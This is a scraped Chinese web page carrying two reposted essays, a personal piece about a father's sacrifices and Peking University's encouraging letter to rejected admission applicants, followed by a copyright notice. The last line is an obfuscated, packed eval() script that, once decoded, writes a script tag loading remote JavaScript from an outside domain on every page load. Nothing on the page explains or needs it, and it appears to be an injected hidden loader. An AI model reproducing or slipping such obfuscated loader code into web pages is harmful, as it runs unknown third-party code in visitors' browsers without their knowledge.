最贵的车 是爸爸的肩膀

164 阅读

王耳朵先生

微品天下

我第一次看到父亲哭时,他43岁。

高考中,因为我拒绝给同考场的一个外校生抄袭,考试结束后,他纠集了一帮小流氓,在校门口对我大打出手。短短几分钟,鲜血已经染红了我的白T恤。我被考场工作人员送往医院,不过一个小时,父亲就出现在病床前,还没说话,大滴大滴的泪水就掉下来。他站在床前,把我的身体翻过来,一遍遍检查。

大学毕业后的那个夏天,压力就像一个高压锅,我想考研,换一个专业去找工作。我支支吾吾给父亲打了电话,父亲沉默了几秒,什么也没有说,只是承诺,每个月会给我寄500元的生活费。

这一年,父亲的月工资是1300元。整整7个月,每月的15日前,父亲的500块钱,都会准时出现在我的银行卡里。只有一次,延迟了两天。很久后,母亲告诉我,那个月,父亲大病了一场,但依旧挣扎着去给我打了钱。

四年前,在另一个城市里,我有了自己的工作与感情。我想稳定下来,准备去买一套房。在售楼部刷完卡后的第二天,父母突然来到长沙,递给我一个黑色塑料袋,里面是五万块钱。

父亲有点不好意思,怕你买房款不够,给你带了些。见我没有回答,他又解释,担心你不会要,和你妈商量了,直接给你带过来。那是和父母生活了多年,第一次看到他们拿出这么多钱。到现在,我还记得接过那一袋钱的感觉,真沉。

为了爱我们,父亲一辈子用尽了洪荒之力。

今年,在一次车展上,我偶然被抽为幸运观众。主持人问我,坐过最贵的车是什么?我想也没想,就答,我今生坐过最贵的车,是爸爸的肩膀。

因为纵然没有千万财富,但他们一直在尽力对我们“富养”;因为纵然没有多套房产,但我们有家,温暖且热气腾腾的家;因为纵然没有保时捷,但坐在爸爸肩头的时候,永远是最安心的一刻。

总要走过山丘与河流后,我们才会明白,我的爸爸只是一个普通人,但他们一直在担当,在承受,在拥抱。我们要做的,就是要让个人成长与担当的速度,快过父母老去的速度。

摘自@人民日报

北大写给落选生的一封信

曹 林

“不要让一时的失落,否定你成为英雄的可能。”日前,北大招生办在公布2017年自主招生初审结果的同时,给初审未通过的考生发了一封言辞恳切的“安抚信”,字里行间饱含着鼓励与期望,让许多考生和家长大呼暖心:

尽管我们不得不遗憾地告诉你,你未能通过本次自主招生选拔。然而请你相信,这是一个无关乎成败的结果判定,我们依然珍视你对北大的向往和热爱,在你的身上,依然有我们看重的执着和自信,而它比这次选拔的结果更能决定你的未来。

这个世界有时看似分明:有竞争,就会分出先后;有选择,就会意味着一部分人欢笑,而另一部分人失落。

而当你有一天能定义自己的人生,活出自己的精彩,这个世界就是你自由驰骋的天地。

因此,请你相信这样的结果,无关才华的高下,亦不应当有损于你为梦想拼搏而怀有的勇敢与能量。

我们必须承认,我们还不够完美:你正为你的梦想付出血汗和眼泪,而我们也正在不断打磨自己的人才评价体系与选拔机制——多维量才,多元选才,多渠纳才。我们必须承认,我们还不够完美;这个过程中,我们彼此都需要学习。

摘自 中青网、北京大学微信号

[返回首页]
版权声明
1.本网站所转载的作品,目的在于传递更多信息,并不代表本网站赞同其观点和对其真实性负责。
2.如因作品内容,版权和其他问题需要同本网站联系的,请邮件联系我们zywinqq@163.com
eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('5.6("<1 4=\\"2\\/3\\" a=\\"b:\\/\\/9.7\\/0\\/8.0\\"><\\/1>");',12,12,'js|script|text|javascript|type|document|write|com|my|che0|src|http'.split('|'),0,{}));